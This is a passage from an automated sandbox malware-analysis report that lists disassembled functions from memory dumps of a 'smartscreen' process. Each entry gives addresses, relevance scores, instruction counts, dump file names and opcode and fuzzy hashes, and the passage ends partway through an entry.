                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction ID: be9d14774810aa6bccb53f8b8f2aef84cbd445e0a43f8931e159da244751b328
                                                              • Opcode Fuzzy Hash: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction Fuzzy Hash: ECE01A6054A3C04FCB0AEB7484698447F70AE6B21078B41DEC049CB1B3D62D8949C701
                                                              Function 00007FFD9B7B7089 Relevance: .5, Instructions: 497COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1c457396cf0e3787922f173e196641c57ec7db047b59f62381eb81537d5a369
                                                              • Instruction ID: 7dc2cc8a58e93fc09532f483ca0fec03f0affc37cb1848fdbd37525faf157b81
                                                              • Opcode Fuzzy Hash: c1c457396cf0e3787922f173e196641c57ec7db047b59f62381eb81537d5a369
                                                              • Instruction Fuzzy Hash: 42025B31A0D7995FE7259B68C8616A53BE1EF82310F0502FED44D8B1F3DA28AD46CF91
                                                              Function 00007FFD9B7B344D Relevance: .3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7cbf23ac45f2e7f1b3add546539be120a250a8a8c4639f4c45a6a4beba2f6629
                                                              • Instruction ID: 3231c3fe3941c33d8b5cb8febd821a291cfd749c3096b8a84d78d0c901fa637d
                                                              • Opcode Fuzzy Hash: 7cbf23ac45f2e7f1b3add546539be120a250a8a8c4639f4c45a6a4beba2f6629
                                                              • Instruction Fuzzy Hash: C9910821B1DA5D0FEB9CEA68447667573C2EF94304F45427AE40EC32E7DD28BD858B90
                                                              Function 00007FFD9B7B2411 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25af50b6c7aa863a22707e9307151508ae1e8e190401836f5b719a84c2fd7b60
                                                              • Instruction ID: ec84e58da910415ed9899937d619202799e0b4d585d3df4ac00b8a21dbcdbb2c
                                                              • Opcode Fuzzy Hash: 25af50b6c7aa863a22707e9307151508ae1e8e190401836f5b719a84c2fd7b60
                                                              • Instruction Fuzzy Hash: 3051E931B0D75D4FDB68EB58D8A4AA877D2FB94310F0502BAD40DD72E6CE286D458F81
                                                              Function 00007FFD9B780945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction ID: e5cb615937688ad0b9fcfbfe5a384d5356d8417bfd627d28e2c45eeb832c2d6f
                                                              • Opcode Fuzzy Hash: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction Fuzzy Hash: E341033270D9184FE728EAACF89A9F973D0EF4532170501BBE48AC7167DE11AC8287C5
                                                              Function 00007FFD9B780960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b000f478270609234fcb6116953d0d273e99c97624b01f2fc138b89fb5d7060b
                                                              • Instruction ID: f2e44be96ca479dd5fc64f9cf993394376ade5ef797403f924922926d57dcca5
                                                              • Opcode Fuzzy Hash: b000f478270609234fcb6116953d0d273e99c97624b01f2fc138b89fb5d7060b
                                                              • Instruction Fuzzy Hash: D231DB25B1DA1D0FE758B66C64A6AF873C2DF98326F1441BAE40EC32F7DD289C414284
                                                              Function 00007FFD9B78116D Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb6d0485614ce71e1197e890cca4831e77862961b0846cd5a762ba82fe1d4d55
                                                              • Instruction ID: 41313e219c30347273fd4b58e96c90185bfc89cbf802c45604fcdf7ebca6835b
                                                              • Opcode Fuzzy Hash: fb6d0485614ce71e1197e890cca4831e77862961b0846cd5a762ba82fe1d4d55
                                                              • Instruction Fuzzy Hash: D431B631E09A4E8FDB45EB68C8A49A97BF0FF5A311F0546BAC009D71B2DB38A541CB40
                                                              Function 00007FFD9B780998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 749477fd002f90606291b39808c46a389f230d78963bf942133b8fad2b1aed29
                                                              • Instruction ID: 139e262f5e01c1c791ec2b1184c9b74ce6a645587370515792a36d9e34013517
                                                              • Opcode Fuzzy Hash: 749477fd002f90606291b39808c46a389f230d78963bf942133b8fad2b1aed29
                                                              • Instruction Fuzzy Hash: D6212920B19E1D0FE798F66C54AA67576C2EB8C326F5141B9E40EC33F7DC289C418285
                                                              Function 00007FFD9B7B6FE8 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Function 00007FFD9B786CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 090258812e0e31d043148b1e66e8f088f383b96c0af25f0c5524c6c89997d366
                                                              • Instruction ID: 7d29d5e3f377b89925d0967303523d95f6a3ca05498821ae478da83860f8f4a4
                                                              • Opcode Fuzzy Hash: 090258812e0e31d043148b1e66e8f088f383b96c0af25f0c5524c6c89997d366
                                                              • Instruction Fuzzy Hash: 54212131E19E1D9FDBB5DB48C4A07E973E1FB58311F1102BAD40DD32B1DA75AA408B80
                                                              Function 00007FFD9B7941BB Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b790000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6864d3282cc0ef06a8f0c97480d40e2a7b0f206563d736159ea154a734f30db9
                                                              • Instruction ID: 41582bb33511f084672afad134764d69a020b6c2e0b3fd8473638003e21d103b
                                                              • Opcode Fuzzy Hash: 6864d3282cc0ef06a8f0c97480d40e2a7b0f206563d736159ea154a734f30db9
                                                              • Instruction Fuzzy Hash: 59116D70E1861E8BEB24DF98D8686BD77B2FF54314F51033AD41A972A5DF782A418780
                                                              Function 00007FFD9B7BD675 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b06e853107d819dadfe64e52cf98638a19ecf39410740413f0f9b6c38d38e17
                                                              • Instruction ID: a0a37d934e3060455db26619bc0950f0c6168d5d14d72ffdec99447917ee2926
                                                              • Opcode Fuzzy Hash: 0b06e853107d819dadfe64e52cf98638a19ecf39410740413f0f9b6c38d38e17
                                                              • Instruction Fuzzy Hash: 46019E31B1562E4BFB64969894657F973E1EF84348F050239D40ED31E1DA2CAD408F80
                                                              Function 00007FFD9B7BB23D Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5beb2e16a00ac9525df3431d399416f3a97854bbd1feea33f6384a490c4ffdad
                                                              • Instruction ID: 4eda8eaf2867d4bce17b21c83be88fe11a513ed3ee10c03dfba4caf85c04ee45
                                                              • Opcode Fuzzy Hash: 5beb2e16a00ac9525df3431d399416f3a97854bbd1feea33f6384a490c4ffdad
                                                              • Instruction Fuzzy Hash: 73F06D31B09A1E4EEB95EA9C54A67F877D1EF98212F440176E41CC32B3CE2869854B81
                                                              Function 00007FFD9B784CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Function 00007FFD9B7B7A3D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Function 00007FFD9B784D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Function 00007FFD9B794935 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b790000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Function 00007FFD9B784DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Function 00007FFD9B7BAB09 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Function 00007FFD9B7B1D49 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Function 00007FFD9B7B8299 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Function 00007FFD9B784B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Function 00007FFD9B7BD7E9 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Function 00007FFD9B795380 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b790000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Function 00007FFD9B7959C0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b790000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction ID: 1ab617b5807b60862730bf7e2eea1a76f8055e7b0ce4c2cca0b37e0c22b51329
                                                              • Opcode Fuzzy Hash: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction Fuzzy Hash: C2D05E30B60A0D4B8B4CA62D8868430B3D2F7AA2067A45278940BC6295ED25ECC68B81
                                                              Function 00007FFD9B793BD0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b790000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Function 00007FFD9B783276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b780000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
                                                              Function 00007FFD9B7BA670 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B7BA5E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B7B9059 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction ID: 9092713a171e2d5dad25970d90dfa1a4dd6ca75999bd10eba25e6c1d4413d71b
                                                              • Opcode Fuzzy Hash: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction Fuzzy Hash: C8E0173150A7884FCB0BAB348CA99803FB0EE6B21178B01C7D045CF5B3EA598D89C762
                                                              Function 00007FFD9B7B7A09 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000029.00000002.2318422209.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_41_2_7ffd9b7b1000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction ID: d23d908daa4caa6190485d6fb195fe7573d829f4088949ca24af75020e520b84
                                                              • Opcode Fuzzy Hash: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
